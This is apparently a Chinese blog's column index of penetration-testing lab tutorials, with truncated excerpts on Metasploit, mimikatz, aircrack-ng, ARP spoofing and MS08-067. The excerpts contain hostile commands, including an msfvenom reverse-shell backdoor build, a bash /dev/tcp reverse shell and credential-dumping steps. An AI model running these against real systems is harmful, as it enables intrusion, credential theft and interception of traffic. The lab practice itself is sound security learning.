渗透
s0mor
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
CVE-2019-9762漏洞复现
CVE-2019-9762:在PHPSHE 1.7中,include/plugin/payment/alipay/pay.php文件存在SQL注入,不需要进行身份验证进入主页面,注册账号并登录定位到存在注入的文件,在个人中心,充值板块,使用支付宝充值输入充值金额,用Burp抓包,点击提交先抓到user.php?mod=pay这个包,放掉,会抓到第二个跳转请求pay.php?id=pay...原创 2020-01-04 19:30:39 · 2842 阅读 · 0 评论 -
msfvenom后门生成与利用
利用msfvenom生成木马后门拿到Windows 10靶机权限需要关掉Windows defender生成后门msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=10.101.0.139 lport=1234 -f exe > backdoor.exe配置并监听启动metas...原创 2019-12-02 19:46:39 · 1059 阅读 · 0 评论 -
aircrack-ng
aircrack-ng无线密码暴力破解工具,支持WEP和WPA类型无线网络。抓取到适量的Wi-Fi连接数据包后aircrack-ng wifi-crack.cap列出找到的SSIDaircrack-ng -e hackinglab -b 54:E6:FC:53:E6:D0 -w passwd.txt wifi-crack.cap选择网络,并且载入字典进行暴力破解破解成功...原创 2019-11-09 10:49:33 · 319 阅读 · 0 评论 -
mimikatz
mimikatz已集成到metasploit中需要SYSTEM权限查看权限:getuid若不是SYSTEM权限:getsystem载入mimikatzload mimikatz抓密码mimikatz_command -f samdump::hashesMD5解密就行了...原创 2019-09-10 16:17:26 · 770 阅读 · 0 评论 -
cve2019-0708漏洞利用
利用metasploit对windows 7 x64主机进行攻击添加CVE19-0708漏洞expexp链接:https://github.com/rapid7/metasploit-framework/tree/5a0119b04309c8e61b44763ac08811cd3ecbbf8d/modules/exploits/windows/rdp添加步骤:READMECVE-201...原创 2019-09-08 15:34:38 · 2307 阅读 · 1 评论 -
反弹shell方法
Linux:hacker: 192.168.188.63 (kali)目标: 192.168.72.130 (ubuntu)kali:监听指定端口:nc -lvp 1234ubuntu:反弹shell方法一 bash:bash -i >& /dev/tcp/192.168.188.63/1234 0>&1方法二 python:...原创 2019-08-16 14:31:13 · 773 阅读 · 0 评论 -
kali内网攻击-xhydra
简介xhydra是一款爆破账户密码工具,支持ssh、ftp、rdp等协议爆破xhrdra打开工具一、ssh爆破目标:ubuntu 192.168.78.1341、在Target栏:设置目标地址选择端口数,选择ssh服务勾选Be Verbose(显示详情)和Show Attempts(显示攻击步骤)2、在Passwords栏:设置用户名为root选择Password Li...原创 2019-08-16 17:36:58 · 1932 阅读 · 0 评论 -
kali内网攻击-mitmf
替换图片在/var/www/html/下放入图片mitmf -i eth0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202 --imgrand --img-dir /var/www/html/获取提交的账户密码mitmf -i eth0 --spoof --arp --gateway 192.168.5.1 --ta...原创 2019-11-05 10:59:25 · 649 阅读 · 0 评论 -
nmap扫目标漏洞
nmap -v --script=smb-vuln-*.nse --script-args=unsafe=1 192.168.78.129 -Pn存在MS17-010漏洞原创 2019-08-21 17:14:54 · 941 阅读 · 0 评论 -
kali内网攻击-ettercap
ettercap是一款arp嗅探欺骗工具,通常用来进行中间人攻击启动ettercapettercap -G原创 2019-09-10 16:29:00 · 687 阅读 · 0 评论 -
pkav-爆破账户密码
先尝试登录,并用burp抓包,将请求包复制到pkav中添加密码标记,添加验证码标记对尝试登录的密码123进行md5解密,发现解密结果为123{admin}按照对应密码格式生成一个字典在变体设置中添加相应密码字典,并选择规则类型为变体哈希-MD5 32位f12获得验证码的获取地址,添加到验证码地址里,进行识别测试在重放选项中,设置HTTP重定向为无条件跟踪重定向,选上自动跟踪302...原创 2019-08-15 18:28:48 · 4563 阅读 · 0 评论 -
后渗透阶段
弹消息框msg /server:127.0.0.1 * "hello"进程迁移手动迁移:查看进程ps获取meterpreter进程PID getpid迁移到指定PID进程中migrate 1234自动迁移run post/windows/manage/migrate查看系统信息sysinfo查看是否为虚拟机run post/windows/gather/checkvm...原创 2019-08-16 14:21:29 · 415 阅读 · 0 评论 -
内网指定目标抓包
kali:nmap -sP 192.168.0.1/24确定目标利用 tcpdump 抓包:tcpdump -i eth0 host 192.168.0.1 -w /usr/document/test.cap稍等一会,按ctrl+c停止抓包抓取的包保存在/usr/document/test.cap...原创 2019-08-20 18:07:35 · 1378 阅读 · 0 评论 -
netcat学习笔记
netcat:相当于网络中的瑞士军刀,它所做的事情是在两台主机间建立连接并返回两个数据流。主机A:192.168.12.130主机B:192.168.12.131一、端口扫描扫描主机B开放端口:nc -zvn 192.168.12.131 1-999参数:-u 改变运行模式,默认为TCP,改为UDP-z 适用于扫描,告诉netcat,连接成功后就关闭连接,不进行数据交换-v...原创 2019-08-23 20:14:07 · 495 阅读 · 0 评论 -
kali内网攻击-arpspoof
准备阶段:查看物理机IP地址,将kali的IP地址设置为和物理机同一网段。虚拟机网络适配器设置为桥接模式(复制物理网络连接状态)虚拟网络编辑器在管理员模式下启动后,设置VMnet0为桥接模式,外部链接选择物理机网卡。开启端口转发:echo 1 > /proc/sys/net/ipv4/ip_forward主机探测:windows工具:Advanced IP Scannerkal...原创 2019-08-16 14:20:39 · 1069 阅读 · 0 评论 -
kali内网攻击-armitage
kali:开启postgresql数据库service postgresql start开启工具并连接数据库armitage原创 2019-08-16 14:24:07 · 2035 阅读 · 0 评论 -
MS08-067利用
一、概述利用Windows平台MS08-067漏洞,成功进行远程命令执行操作,并成功进行3389登录。用到的端口:445、3389二、实验环境(虚拟机搭建)目标:windows xp professional sp3 英文版(中文版测试不成功)攻击:Kali Linux三、攻击过程1.获取靶机和Kali Linux的IP地址Windows:DOS窗口输入命令ipconfig /a...原创 2019-08-09 09:14:51 · 19665 阅读 · 5 评论
分享